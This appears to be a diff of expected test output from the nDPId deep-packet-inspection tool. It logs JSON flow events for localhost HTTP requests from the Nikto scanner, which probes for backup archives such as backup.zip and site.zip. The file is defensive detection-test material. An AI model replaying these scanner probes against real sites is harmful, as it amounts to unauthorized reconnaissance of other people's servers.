-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
